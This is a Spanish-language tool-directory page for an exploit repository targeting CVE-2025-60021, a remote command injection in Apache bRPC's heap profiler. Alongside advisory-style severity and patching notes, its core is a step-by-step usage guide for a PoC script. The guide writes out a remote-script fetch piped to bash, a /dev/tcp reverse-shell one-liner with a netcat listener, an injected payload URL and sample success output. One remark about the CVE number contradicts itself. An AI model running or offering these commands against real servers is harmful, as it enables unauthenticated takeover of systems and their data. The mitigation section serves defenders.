Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/mefhika120/ashwesker-cve-2025-60021
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingDesarrollo de Payloads
GitHubmefhika120/ashwesker-cve-2025-60021

Ashwesker-CVE-2025-60021

CVE-2025-60021

Ver Repositorio
2hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛑 CVE-2025-60021 — Inyección de comandos remota en Apache bRPC

G_GmijOXQAAX5iE

📌 Resumen

CVE-2025-60021 es una vulnerabilidad crítica de inyección remota de comandos encontrada en el servicio integrado de perfilado de heap (heap profiler) (/pprof/heap) de Apache bRPC en versiones anteriores a la 1.15.0, que permite a atacantes no autenticados ejecutar comandos arbitrarios del sistema operativo. (NVD)


🔓 Detalles de la vulnerabilidad

AtributoInformación
Nombre / IDCVE-2025-60021
ProductoApache bRPC (todas las plataformas)
Versiones afectadas< 1.15.0
Fecha de publicación16 ene 2026 (NVD)
Tipo de vulnerabilidadInyección remota de comandos (CWE-77) (NVD)
Endpoint/pprof/heap
DisparadorParámetro extra_options sin sanitizar
Causa raízEntrada no validada antes de ejecutarse como comando del sistema operativo (openwall.com)

❗Los atacantes pueden inyectar comandos de forma remota simplemente manipulando este parámetro de perfilado.


🚨 Gravedad y riesgo

🔥 Clasificación de gravedad: Crítica 📊 Puntuación base CVSS v3.1: 9.8 / 10 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (INCIBE)

👉 Esto significa que los atacantes pueden ejecutar comandos arbitrarios de forma remota sin iniciar sesión: el peor escenario para los servicios expuestos.


🧠 Desglose técnico

🔍 Cómo funciona

  1. Exposición del Heap Profiler: bRPC expone un endpoint de perfilado (/pprof/heap) destinado al análisis de memoria (jemalloc). (openwall.com)
  2. Error en el manejo de entradas: El endpoint acepta un parámetro extra_options. En lugar de sanitizarlo, bRPC lo pasa directamente al shell del sistema operativo. (openwall.com)
  3. Inyección de comandos: Un actor malicioso crea una entrada que incluye comandos del sistema → el servicio los ejecuta. (CVE Details)

Guía paso a paso para usar el script PoC de CVE-2025-60021

Esto asume que tienes el script guardado como CVE-2025-60021.py (aunque el CVE real es 2025-60021; siéntete libre de renombrarlo). Es un script de Python 3 para demostrar la vulnerabilidad de inyección remota de comandos en el heap profiler de Apache bRPC. Ejecútalo únicamente en sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas: explotar sin autorización es ilegal.

Requisitos previos

  1. Entorno de Python: Asegúrate de tener Python 3 instalado (p. ej., 3.6+). El script utiliza módulos integrados además de requests y argparse (que son estándar o fáciles de instalar).

  2. Instala las dependencias: Si aún no están presentes, instala la librería requests:

    root@kitploit:~
    pip install requests
    
  3. Configuración del objetivo: Necesitas un servidor Apache bRPC vulnerable:

    • Versión < 1.15.0.
    • Heap profiler habilitado (revisa la configuración del servidor; a menudo está activado por defecto en entornos de desarrollo).
    • Accesible a través de la red (p. ej., http://localhost:8060 o una IP/puerto remotos). Si pruebas localmente, configura una instancia vulnerable de bRPC (p. ej., mediante Docker o compilación desde el código fuente; consulta la documentación de Apache bRPC).
  4. Permisos: Ejecuta con sudo solo si es necesario para el acceso a la red o los privilegios; de lo contrario, basta con python3 normal.

Paso 1: Guarda el script

Copia el código PoC que proporcioné antes en un archivo llamado CVE-2025-60021.py. Hazlo ejecutable si lo deseas:

root@kitploit:~
chmod +x CVE-2025-60021.py

Paso 2: Comprende los argumentos

El script acepta dos argumentos posicionales obligatorios:

  • target: La URL del servidor bRPC vulnerable (p. ej., http://192.168.1.100:8060 o http://targets:8060; corrige cualquier error tipográfico, como un esquema faltante o un host no válido).
  • cmd: El comando a ejecutar en el objetivo (p. ej., "id" para información del usuario, o algo más complejo como "curl http://your-server/reverse-shell.sh | bash" para una reverse shell). Usa && o ; para encadenar varios comandos.

Paso 3: Ejecuta el script

Abre una terminal (p. ej., en Kali Linux, ya que la estás usando) y ejecútalo con tu objetivo y comando. Ejemplos de comandos:

  • Prueba básica (obtener información del sistema):

    root@kitploit:~
    sudo python3 CVE-2025-60021.py http://targets:8060 "id && whoami && uname -a"
    
  • Ejemplo de reverse shell (reemplaza your-listener-ip y el puerto; configura un listener como nc -lvnp 4444 primero):

    root@kitploit:~
    sudo python3 CVE-2025-60021.py http://targets:8060 "bash -i >& /dev/tcp/your-listener-ip/4444 0>&1"
    
  • Si usas HTTPS o un puerto diferente, ajusta la URL en consecuencia (p. ej., https://target:443; el script lo maneja, pero añade --insecure si hay problemas de certificado).

Paso 4: Interpreta la salida

Indicadores de éxito:

  • ¡El exploit probablemente tuvo éxito! (200 OK)
  • Posible salida del comando en el cuerpo de la respuesta (p. ej., uid=0(root)... si ejecutó id).
  • Para comandos sin salida (p. ej., escritura de archivos o shells), revisa el servidor objetivo (registros, procesos) o tu listener.

Indicadores de fallo (como lo que viste):

  • ¿Recibiste el código de estado 404? ¿Quizás no es vulnerable?"
  • Mensajes de error como "[E1002] Heap profiler is not enabled" significan que el endpoint no está activo: habilítalo en el objetivo o busca una instancia vulnerable diferente.
  • Timeouts o errores de conexión: objetivo inalcanzable, firewall bloqueando o puerto incorrecto.
  • Si no se filtra ninguna salida, el comando igualmente se ejecuta silenciosamente en el servidor.

Paso 5: Solución de problemas comunes

  • Error 404: Heap profiler deshabilitado. Actívalo en la configuración de bRPC (p. ej., --enable_heap_profiler=true) y reinicia el servidor.
  • Error de argparse: Olvidaste el argumento cmd; inclúyelo siempre.
  • Sin salida en el cuerpo de la respuesta: Algunos comandos no producen salida estándar. Usa aquellos que sí la produzcan (p. ej., echo "test" > /tmp/proof.txt) y verifica el archivo en el objetivo.
  • Privilegios: Si el proceso de bRPC se ejecuta como no root, los comandos están limitados a los permisos de ese usuario.
  • Ajustes del payload: Si ; no funciona, prueba && o | para encadenar. Codifica en URL los caracteres especiales si es necesario (el script maneja la mayoría).
  • Pruebas locales: Levanta un contenedor Docker vulnerable de bRPC para verificar sin arriesgar sistemas reales.

Paso 6: Limpieza y notas éticas

  • Después de las pruebas, parchea el objetivo: actualiza a bRPC 1.15.0+ o deshabilita /pprof/heap.
  • Elimina cualquier artefacto (p. ej., shells o archivos creados).
  • Registra tus pruebas para cumplimiento normativo si estás haciendo pentesting.

Si el exploit tuvo éxito en un objetivo vulnerable (p. ej., heap profiler habilitado, bRPC sin parchear <1.15.0), la salida en tu terminal se vería más o menos así (los detalles exactos dependen de la salida estándar del comando y la configuración del servidor):

root@kitploit:~
[*] Sending payload to: http://targets:8060/pprof/heap?extra_options=%3B+id+%26%26+whoami+%26%26+uname+-a+%23
[*] Executing command: id && whoami && uname -a
[+] Exploit likely succeeded! (200 OK)
[+] Check your listener / server logs for output

Response body (possible command output):

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
user
Linux target-host 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-29) x86_64 GNU/Linux

[followed by heap profile data or binary-ish output from jemalloc, like memory stats or a dump]

Las señales clave: estado 200 OK, y si tu comando (como id && whoami && uname -a) produce salida, esta podría aparecer en el cuerpo de la respuesta (mezclada con basura del perfilador). Para comandos silenciosos (p. ej., reverse shell), revisa el servidor objetivo o tu listener para ver actividad; no hay confirmación directa en la terminal más allá del 200. 😈


🛠 Mitigación y correcciones

✅ Solución principal

  • 👉 Actualiza Apache bRPC a la versión 1.15.0 o posterior. (NVD)

🧩 Corrección alternativa

  • 🛠 Aplica el parche oficial manualmente desde el repositorio de GitHub de Apache bRPC (Pull Request #3101). (openwall.com)

🔒 Protecciones adicionales

  • Firewall / ACLs: Bloquea el acceso a /pprof/heap desde redes no confiables.
  • Desactivar el perfilado: Apaga el heap profiling donde no sea necesario.
  • Monitorear registros: Vigila actividad inusual del perfilador.

💡 Por qué esto es peligroso

✔ Los atacantes no necesitan credenciales. ✔ Funciona a través de la red. ✔ Afecta a todas las plataformas que usan bRPC vulnerable. ✔ Puede llevar al compromiso total del sistema.

Las empresas que usan bRPC para servicios críticos (p. ej., búsqueda, almacenamiento, pipelines de machine learning) corren un riesgo especial porque esta falla convierte una herramienta de diagnóstico en un vector de ataque. (Daily CyberSecurity)


🧾 Notas adicionales

⚠ EPSS (Predicción de explotación): Algunas fuentes indican baja observación de explotación hasta ahora, pero la facilidad de explotación significa que podría ser utilizada en ataques reales rápidamente. (Tenable®)

📌 Clasificación: CWE-77 — Neutralización incorrecta de elementos especiales en un comando (Inyección de comandos). (NVD)


📎 Referencias

  • NIST/NVD entrada de vulnerabilidad para CVE-2025-60021 (NVD)
  • Apache y Openwall Security Advisory detalles (openwall.com)
  • INCIBE-CERT CVSS y desglose de métricas (INCIBE)
  • CVE Details resumen (versiones afectadas y guía de corrección) (CVE Details)

Si estás ejecutando Apache bRPC en producción, aplica el parche inmediatamente y restringe el acceso a los endpoints de diagnóstico para reducir el riesgo.

Descargar herramienta
Categoría de impactoEfecto
ConfidencialidadAlta
IntegridadAlta
DisponibilidadAlta
Vector de ataqueRed
PrivilegiosNo se requieren
Interacción del usuarioNo se necesita(INCIBE)